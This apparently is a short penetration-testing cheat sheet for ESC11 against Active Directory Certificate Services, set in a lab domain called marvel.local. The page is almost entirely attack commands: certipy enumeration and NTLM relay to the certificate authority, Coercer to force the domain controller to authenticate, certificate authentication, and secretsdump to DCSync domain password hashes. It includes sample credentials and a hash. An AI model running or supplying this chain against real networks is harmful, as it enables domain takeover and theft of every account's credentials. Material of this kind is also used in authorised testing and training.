Search

ESC11

Resource: Toby Exploiting Active Directory Certificate Services - ESC11 WalkthroughToby Exploiting Active Directory Certificate Services - ESC11 Walkthrough

No PKINIT? RBCD TrustedSec Practical Attacks against NTLMv1TrustedSec Practical Attacks against NTLMv1

Check:

$ certipy find -u fcastle@marvel.local -p 'Password1' -dc-ip 192.168.218.136 -stdout

If vulnerable to ESC11:

use certipy to relay:

certipy relay -target 'rpc://HYDRA-DC.marvel.local' -ca 'MARVELCA' -dc-ip 192.168.218.136

Note: For domain controllers, we must specify -template in DomainController. Likely full command:

certipy relay -target 'rpc://HYDRA-DC.marvel.local' -ca 'MARVELCA' -template DomainController -debug

If target is not the same as DC, see ESC1

Coerce the DC on Coercer:

Coercer coerce -t dc.ip.goes.here -u userHere -p 'Password123!' -d marvel.local -l certipy.server.ip.here

Once pfx is retrieved:

certipy auth -pfx dc.pfx -dc-ip dc.ip.goes.here -domain marvel.local

Use the obtained machine NTLM to DCSync the DC with secretsdump:

secretsdump.py -hashes :e52cac67419a9a224a3b108f3fa6cb6d -just-dc-ntlm 'ACME/dc01$@dc01.domain.com'